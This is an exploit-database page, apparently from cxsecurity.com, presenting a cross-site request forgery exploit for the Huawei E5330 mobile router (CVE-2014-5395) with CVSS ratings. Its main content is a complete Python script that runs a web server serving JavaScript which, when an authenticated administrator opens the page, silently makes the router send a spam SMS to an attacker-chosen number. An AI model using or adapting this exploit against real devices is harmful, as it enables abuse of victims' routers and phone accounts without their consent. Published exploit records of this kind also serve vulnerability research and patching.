Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
Huawei E5330 21.210.09.00.158 Cross Site Request Forgery
2019.01.08
Credit:
Nathu Nandwani
Risk:
Low
Local:
No
Remote:
Yes
CVE:
CVE-2014-5395
CWE:
CWE-352
Ogólna skala CVSS:
6.8/10
Znaczenie:
6.4/10
Łatwość wykorzystania:
8.6/10
Wymagany dostęp:
Zdalny
Złożoność ataku:
Średnia
Autoryzacja:
Nie wymagana
Wpływ na poufność:
Częściowy
Wpływ na integralność:
Częściowy
Wpływ na dostępność:
Częściowy
# Exploit Title: Huawei E5330 Cross-Site Request Forgery (Send SMS) # Date: 01/07/2019 # Exploit Author: Nathu Nandwani # Website: http://nandtech.co/ # Vendor Homepage: https://consumer.huawei.com/in/mobile-broadband/e5330/ # Version: 21.210.09.00.158 # Tested on: Windows 10 x64 # CVE: CVE-2014-5395 # Note: The administrator who opens the URL should be authenticated. import socket import time server_ip = "0.0.0.0" server_port = 80 huawei_ip = "192.168.8.1" receiving_phone_no = "01234567890" sms_text = "This is a SPAM text from Huawei E5330" sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.bind((server_ip, server_port)) sock.listen(1) print "Currently listening at " + server_ip + ":" + str(server_port) client, (client_host, client_port) = sock.accept() print "Client connected: " + client_host + ":" + str(client_port) print "" print client.recv(1000) client.send('HTTP/1.0 200 OK\r\n') client.send('Content-Type: text/html\r\n') client.send('\r\n') client.send(""" <html> <body> <script> var xhr = new XMLHttpRequest(); xhr.open("POST", "http://""" + huawei_ip + """/api/sms/send-sms", true); xhr.send('<?xml version="1.0" encoding="UTF-8"?><request><Index>0</Index><Phones><Phone>""" + receiving_phone_no + """</Phone></Phones><Sca></Sca><Content>""" + sms_text + """</Content><Length>""" + str(len(sms_text)) + """</Length><Reserved>1</Reserved><Date>""" + time.strftime('%Y-%m-%d %H:%M:%S') + """</Date></request>'); </script> </body> </html> """) client.close() sock.close()
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top